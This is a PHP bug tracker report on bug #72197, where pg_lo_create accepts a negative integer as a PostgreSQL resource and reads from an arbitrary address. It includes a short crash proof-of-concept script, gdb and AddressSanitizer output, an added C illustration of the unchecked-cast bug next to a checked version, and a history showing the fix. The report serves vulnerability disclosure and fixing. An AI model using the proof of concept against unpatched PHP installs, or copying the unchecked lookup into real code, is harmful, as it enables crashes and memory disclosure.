Bug #72197 pg_lo_create arbitrary read
Submitted: 2016-05-11 12:48 UTC Modified: 2016-05-11 16:16 UTC
From: fernando at null-life dot com Assigned:
Status: Closed Package: PostgreSQL related
PHP Version: 7.0.6 OS: Linux
Private report: No CVE-ID: None
 [2016-05-11 12:48 UTC] fernando at null-life dot com
Description:
------------
When passing a negative number to pg_lo_create, it will use this value as a resource and then call zend_fetch_resource2 with it, causing an invalid read.

https://github.com/php/php-src/blob/PHP-7.0/ext/pgsql/pgsql.c#L3189

I believe the issue is caused because the function accepts mixed-type data instead of only a resource here.

Reading symbols from /home/user/php-7.0/sapi/cli/php...done.
(gdb) b zend_fetch_resource2
Breakpoint 1 at 0x847a4cd: file /home/user/php-7.0/Zend/zend_list.c, line 104.
(gdb) r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, zend_fetch_resource2 (res=0xffff8000, resource_type_name=0xf404d1f4 "PostgreSQL link", resource_type1=44, resource_type2=45) at /home/user/php-7.0/Zend/zend_list.c:104  // !! res= 0xffff8000 = -32768
(gdb) x/10i $eip
=> 0x847a4cd <zend_fetch_resource2+30>: mov    %gs:0x14,%eax
   0x847a4d3 <zend_fetch_resource2+36>: mov    %eax,-0xc(%ebp)
   0x847a4d6 <zend_fetch_resource2+39>: xor    %eax,%eax
   0x847a4d8 <zend_fetch_resource2+41>: cmpl   $0x0,-0x1c(%ebp)
   0x847a4dc <zend_fetch_resource2+45>: je     0x847a504 <zend_fetch_resource2+85>
   0x847a4de <zend_fetch_resource2+47>: mov    -0x1c(%ebp),%eax             // load res pointer to arbitrary address (0xffff8000)
   0x847a4e1 <zend_fetch_resource2+50>: mov    0xc(%eax),%eax               // try read res->type element (0xffff8000 + 0xc)
   0x847a4e4 <zend_fetch_resource2+53>: cmp    0x10(%ebp),%eax
   0x847a4e7 <zend_fetch_resource2+56>: jne    0x847a4f1 <zend_fetch_resource2+66>
   0x847a4e9 <zend_fetch_resource2+58>: mov    -0x1c(%ebp),%eax

Test script:
---------------
```php
<?php
// Proof of concept from the report: a negative integer in the connection
// position is handed to the resource lookup instead of being rejected.
$var1 = -32768;
$var2 = "12";
pg_lo_create($var1, $var2);
```


Expected result:
----------------
No crash

Actual result:
--------------
ASAN:SIGSEGV
=================================================================
==4544==ERROR: AddressSanitizer: SEGV on unknown address 0xffff800c (pc 0x096b1fdc bp 0x0000002d sp 0xffece8c0 T0)
    #0 0x96b1fdb in zend_fetch_resource2 /home/user/php-7.0asan/Zend/zend_list.c:106
    #1 0xf1c368e8 in zif_pg_lo_create /home/user/php-7.0asan/ext/pgsql/pgsql.c:3231
    #2 0x9a31522 in ZEND_DO_ICALL_SPEC_HANDLER /home/user/php-7.0asan/Zend/zend_vm_execute.h:586
    #3 0x980f979 in execute_ex /home/user/php-7.0asan/Zend/zend_vm_execute.h:414
    #4 0x9b29bf2 in zend_execute /home/user/php-7.0asan/Zend/zend_vm_execute.h:458
    #5 0x95e8bcc in zend_execute_scripts /home/user/php-7.0asan/Zend/zend.c:1427
    #6 0x932dfeb in php_execute_script /home/user/php-7.0asan/main/main.c:2494
    #7 0x9b32370 in do_cli /home/user/php-7.0asan/sapi/cli/php_cli.c:974
    #8 0x80a6596 in main /home/user/php-7.0asan/sapi/cli/php_cli.c:1344
    #9 0xf6c02636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #10 0x80a6b1a  (/ramdisk/php-70/sapi/cli/php+0x80a6b1a)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/php-7.0asan/Zend/zend_list.c:106 zend_fetch_resource2
==4544==ABORTING

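The bug class the report describes, as an added example in C that is not part of the report or of php-src: a constructed tagged-value type (not the real zval or zend_resource layout, an assumption for illustration only) with the unchecked resource lookup beside a tag-checking one. The type ids 44 and 45 are the ones visible in the gdb output above.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed miniature of a tagged value; this is NOT the real Zend zval or
 * zend_resource layout, only enough to show the unchecked-cast bug class. */
enum { IS_LONG = 4, IS_RESOURCE = 9 };
enum { LE_PGSQL_LINK = 44, LE_PGSQL_PLINK = 45 };  /* the two type ids in the gdb output */

typedef struct { void *ptr; int type; } resource;
typedef struct { int tag; union { intptr_t lval; resource *res; } u; } value;

/* Buggy pattern: assume the argument is a resource and hand the payload to the
 * lookup. For an IS_LONG the union carries the caller's integer, so the
 * pointer is caller-chosen. It is returned, never dereferenced, so this runs safely. */
static const resource *link_unchecked(const value *arg) {
    return arg->u.res;
}

/* Hardened pattern: check the value tag, then the resource type, before use. */
static const resource *link_checked(const value *arg) {
    if (arg->tag != IS_RESOURCE || arg->u.res == NULL) return NULL;
    if (arg->u.res->type != LE_PGSQL_LINK && arg->u.res->type != LE_PGSQL_PLINK) return NULL;
    return arg->u.res;
}

static value make_long(intptr_t v) { value z = { IS_LONG, { .lval = v } }; return z; }
static value make_res(resource *r) { value z = { IS_RESOURCE, { .res = r } }; return z; }

/* Address the unchecked path would treat as a resource for a given integer. */
static intptr_t unchecked_addr_for(intptr_t attacker_long) {
    value z = make_long(attacker_long);
    return (intptr_t)link_unchecked(&z);
}
/* 1 if the checked path accepts an integer in the connection slot (it must not). */
static int checked_accepts_long(intptr_t attacker_long) {
    value z = make_long(attacker_long);
    return link_checked(&z) != NULL;
}
/* 1 if the checked path accepts a resource of the given type id. */
static int checked_accepts_type(int res_type) {
    resource r = { NULL, res_type };
    value z = make_res(&r);
    return link_checked(&z) == &r;
}

int main(void) {
    printf("unchecked lookup would dereference %p for -32768\n", (void *)unchecked_addr_for(-32768));
    return 0;
}
```

On a 32-bit build the printed pointer is 0xffff8000, matching the gdb session; on 64-bit it is the sign-extended 0xffffffffffff8000.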
Patches

Pull Requests

History

 [2016-05-11 16:16 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-05-12 09:41 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=7f6e285430e8ec8109085a24978796fc99813498
Log: Fixed bug #72197 pg_lo_create arbitrary read
 [2016-05-12 09:41 UTC] ab@php.net
-Status: Open +Status: Closed
 [2016-07-20 11:31 UTC] davey@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=7f6e285430e8ec8109085a24978796fc99813498
Log: Fixed bug #72197 pg_lo_create arbitrary read
Last updated: Tue Oct 08 12:01:26 2024 UTC